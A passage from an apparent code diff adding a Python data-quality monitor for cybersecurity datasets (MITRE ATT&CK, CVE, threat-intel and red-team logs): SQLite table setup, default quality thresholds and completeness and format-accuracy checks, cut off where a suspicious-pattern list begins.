Quality Alerts table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS quality_alerts ( + alert_id TEXT PRIMARY KEY, + dataset_id TEXT NOT NULL, + metric_type TEXT NOT NULL, + severity TEXT NOT NULL, + message TEXT NOT NULL, + value REAL NOT NULL, + threshold REAL NOT NULL, + created_at TEXT NOT NULL, + resolved_at TEXT, + resolved BOOLEAN DEFAULT FALSE + ) + """) + + # Dataset Profiles table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS dataset_profiles ( + dataset_id TEXT PRIMARY KEY, + total_records INTEGER NOT NULL, + total_columns INTEGER NOT NULL, + null_percentage REAL NOT NULL, + duplicate_percentage REAL NOT NULL, + schema_hash TEXT NOT NULL, + last_updated TEXT NOT NULL, + column_profiles TEXT NOT NULL + ) + """) + + # Quality Rules table + cursor.execute(""" + CREATE TABLE IF NOT EXISTS quality_rules ( + rule_id TEXT PRIMARY KEY, + dataset_pattern TEXT NOT NULL, + metric_type TEXT NOT NULL, + threshold_min REAL, + threshold_max REAL, + severity TEXT NOT NULL, + enabled BOOLEAN DEFAULT TRUE, + created_at TEXT NOT NULL + ) + """) + + # Create indices + cursor.execute("CREATE INDEX IF NOT EXISTS idx_metrics_dataset ON quality_metrics(dataset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_metrics_type ON quality_metrics(metric_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_alerts_dataset ON quality_alerts(dataset_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_alerts_severity ON quality_alerts(severity)") + + conn.commit() + conn.close() + + def _load_default_thresholds(self) -> Dict[str, Dict[str, float]]: + """Load default quality thresholds for cybersecurity data""" + return { + "mitre_attack": { + "completeness": {"min": 0.95, "max": 1.0}, + "accuracy": {"min": 0.90, "max": 1.0}, + "consistency": {"min": 0.85, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0}, + "uniqueness": {"min": 0.98, "max": 1.0} + }, + "cve_data": { + "completeness": {"min": 0.90, "max": 1.0}, + "accuracy": {"min": 0.95, "max": 1.0}, + "timeliness": 
{"min": 0.80, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0} + }, + "threat_intel": { + "completeness": {"min": 0.85, "max": 1.0}, + "accuracy": {"min": 0.90, "max": 1.0}, + "timeliness": {"min": 0.90, "max": 1.0}, + "relevance": {"min": 0.80, "max": 1.0} + }, + "red_team_logs": { + "completeness": {"min": 0.98, "max": 1.0}, + "consistency": {"min": 0.90, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0} + } + } + + def measure_completeness(self, data: pd.DataFrame) -> float: + """Measure data completeness (percentage of non-null values)""" + if data.empty: + return 0.0 + + total_cells = data.shape[0] * data.shape[1] + non_null_cells = total_cells - data.isnull().sum().sum() + return non_null_cells / total_cells if total_cells > 0 else 0.0 + + def measure_accuracy(self, data: pd.DataFrame, dataset_type: str) -> float: + """Measure data accuracy based on validation rules""" + if data.empty: + return 0.0 + + accuracy_score = 1.0 + total_checks = 0 + failed_checks = 0 + + # Cybersecurity-specific accuracy checks + if dataset_type == "mitre_attack": + # Check technique ID format + if 'technique_id' in data.columns: + technique_pattern = re.compile(r'^T\d{4}(\.\d{3})?$') + invalid_ids = ~data['technique_id'].str.match(technique_pattern, na=False) + failed_checks += invalid_ids.sum() + total_checks += len(data) + + elif dataset_type == "cve_data": + # Check CVE ID format + if 'cve_id' in data.columns: + cve_pattern = re.compile(r'^CVE-\d{4}-\d{4,}$') + invalid_cves = ~data['cve_id'].str.match(cve_pattern, na=False) + failed_checks += invalid_cves.sum() + total_checks += len(data) + + elif dataset_type == "threat_intel": + # Check IP address format + if 'ip_address' in data.columns: + ip_pattern = re.compile(r'^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') + invalid_ips = ~data['ip_address'].str.match(ip_pattern, na=False) + failed_checks += invalid_ips.sum() + total_checks += len(data) + + # General accuracy checks + for column in 
data.select_dtypes(include=['object']).columns: + # Check for suspicious patterns + suspicious_patterns = ['